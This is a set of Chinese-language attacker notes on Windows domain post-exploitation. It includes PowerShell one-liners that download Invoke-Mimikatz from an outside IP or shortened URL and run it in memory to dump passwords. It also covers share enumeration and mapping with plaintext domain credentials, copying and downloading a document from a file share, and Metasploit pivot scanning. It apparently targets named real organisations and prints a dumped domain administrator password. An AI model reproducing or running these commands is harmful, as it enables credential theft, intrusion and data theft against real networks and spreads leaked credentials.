powershell 执行
windows 命令 wmic
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
命令: 可以 dump 出 密码来
powershell 脚本是 https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
1)becon 或者 meterpreter 先 getsystem
2)wmic process call create "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds\" >d:\2.txt"
直接2.txt 上的 dump 上有密码
设置linux console 快捷键 Command: gnome-terminal
先开启kali 服务 System service 开启 metasploit
下载 cobaltstrike http://www.advancedpentest.com/download
Net view命令用于查看远程主机的所有共享资源,其语法格式为: net view \\IP地址
net view /domain 查看域帐户
net view /domain:JINDALSTEEL
net view /domain:JINDAL.AFRICA
whoami /groups 查询组下面的帐户 无用
net user /domain 查询域下帐户 无用
net group /domain 域下组 无用
net group "domain admins"/domain 上面查询的组的域信息 无用
shell cmd /c for %a in (WIN-DC,WIN-WALKER) do ping -n 1 %a >> info2.txt 看存活主机
shell cmd /c for /f %a in (info.txt) do ping -n 1 %a >> zend.txt
ps 看进程 steal_token pid SYSTEM权限
Net use命令把远程主机的某个共享资源映射为本地盘符以方便使用,其语法格式为: net use <驱动器盘符>: \\IP地址\sharename
net use Z: \\192.168.10.210\nero
net use \\ip(或者主机名)\c$ 域帐户密码 /u:域\域帐户
cmd /c for %a in (10.36.68.211,10.36.68.227,10.36.68.195,10.36.68.197,10.36.68.201,10.36.68.217)
do net use \\%a jspl@BHARAT(密码) /u:jindalggn\root(域帐号) >> use.txt
dir \\10.36.68.227\c dir"10.36.68.227\c \Documents and settings" 看到电脑帐户jspladmin
net user jspladmin /domain
net use \\10.36.68.195 /del
net use \\10.36.68.195 Jin786Dal /u:jindalggn\jspladmin
dir "\\10.36.68.195\c$\Documents and settings\jspladmin\my documents"
net view \\10.36.68.211 看共享资源 然后查看
dir \\10.36.68.211\NASUtils
dir "\\10.36.68.211\work_station"
download \\10.36.68.221\work_station\Block-IX .pptx
copy "\\10.36.68.221\work_station\Block-IX .pptx" c:\windows\temp\wahaha.log
download wahaha.log
net time \\127.0.0.1
net use 查看连接
meterpreter 上 进行端口扫描
run autoroute -s x.x.x.0/24
background
use auxiliary/scanner/portscan/tcp
set threads 50
set ports 80,8080,21,22,23,445,443,3389
expoit
计划任务:
at \\x.x.x.x 10:11 c:\xxx.exe
2003 下不支持powershell
cmd /c powershell "IEX (New-Object Net.WebClient).DownloadString('http://107.170.234.111:80/download/index.ps1'); Invoke-Mimikatz -Command \"privilege::debug sekurlsa::logonpasswords\"" > c:\3.txt
* Username : Administrator
* Domain : TAIHE.COM
* Password : Domainadmin!@#
当它的网不能上外网时,那么就上传脚本 ps1 去搞
powershell "IEX (New-Object Net.WebClient).DownloadString('c:/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" >c:\2.txt
etherape 监控